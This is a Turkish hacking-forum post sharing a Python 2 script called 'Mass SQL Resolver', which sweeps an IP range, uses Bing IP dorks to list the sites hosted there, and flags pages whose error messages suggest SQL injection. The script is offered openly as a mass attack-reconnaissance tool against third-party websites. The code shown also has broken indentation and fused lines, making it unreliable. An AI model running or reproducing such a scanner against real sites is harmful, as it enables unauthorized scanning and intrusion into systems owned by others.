• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Yerli Script // Mass SQL Resolver/

capitan

LV
0
 
Katılım
Şub 23, 2020
Mesajlar
108
Tepkime puanı
111
Puanları
43

Dil ve Sürüm:

Python 2.x
V1.0
Coded by:

@El Behram @tokikolik

Range edilen ip aralığındaki makinelerin hostlarındaki tüm sitelerde sql taraması yaparz


Kod:
[HIDE]

# -*- coding: UTF-8 -*-
import urllib
import os
import re
from time import sleep
import socket
import subprocess
import sys

red = "\033[91m"
green = "\033[93m"
default = "\033[0m"
def iprange():

  print "IP Range Scanner"
  print " "
  ip = raw_input("enter 3 part of ip address = ")
  maxrange=input("range = ")
  int(maxrange)

  for i in range(maxrange):
    param = ip + "." + str(i)
    response = os.system("ping -c 1 -w 1 " + param)
    if response == 0:
      print "[+] Founded an alive ip"
      list_ip = open("ip.txt", 'a+')
      list_ip.write(param + '\n')
      list_ip.close()

    else:
      print "[-] Dead"def sqlihunt(dork):
  
 dork= 'IP:'+dork+" php?id= "
 
 start=0
 end=200
 sleep(3)
 print "[info]Getting Websites From Bing ... "
 while start<=end :
  try:
   con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
   
   conf = open(con[0])
   readd=conf.read()
   find=re.findall('<h2><a href="(.*?)"',readd)
   start = start+10
   #return find 
  except IOError:
   print "[ERROR]network error "
   print "[Info]reconnecting "
   sleep(10)
   print "[Info]retrying "
  try :
   for i in range(len(find)):
         rez=find[i]+"'"
         tst = urllib.urlretrieve(rez)
         tstf = open(tst[0])
         tstdd= tstf.read()
         tstfind=re.findall('/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i|You have an error in your SQL syntax|Microsoft VBScript runtime error',tstdd)
         if(tstfind):
          print "[SLQi] : "+ rez 
      file2 =open('sql.txt','a+')
          file2.write(rez + '\n')
      file2.close()
         else:
          print "[No SQLi ] : " + rez
  except IOError:
   print "[ERROR]No result found"

x = """

|==================[*********.org]====================|
 __ __        ___    ____         _        
| \/ | __ _ ___ ___|_ _|_ __ | _ \ ___ ___ ___ | |_  _____ _ __ 
| |\/| |/ _` / __/ __|| || '_ \| |_) / _ \/ __|/ _ \| \ \ / / _ \ '__|
| | | | (_| \__ \__ \| || |_) | _ < __/\__ \ (_) | |\ V / __/ |  
|_| |_|\__,_|___/___/___| .__/|_| \_\___||___/\___/|_| \_/ \___|_|  
             |_|                     
==================[*********.org]====================|
      Coded by El Behram & Tokikolik             """print red + x
print red + " "
print "Mass Ip Resolver V2.0 is starting ... "
print " "
print " "
sleep(2)
while(True):
  print default + "-*-*-*-*- MENU -*-*-*-*-*"
  print "[1] Ip ranger"
  print "[2] Mass resolver"
  print "[3] Exit"
  print default + " "  funch = input("Select funch number :")


  if funch == 1:
    print "Ip ranger is starting.."
    print "enter as ---->> ab.cde.xx"
    print " "
    print " "
    iprange()
    continue

  elif funch == 2:
    print "Mass sql tool is tarting ..."
    dosya = open("ip.txt","r")
    for satir in dosya:
        sqlihunt(satir.strip())
      print " ./done "
      continue
  elif funch ==3:
    print "exit"
    sys.exit()
  else:
    print "Error"


[/HIDE]
 
shape1
shape2
shape3
shape4
shape7
shape8
Üst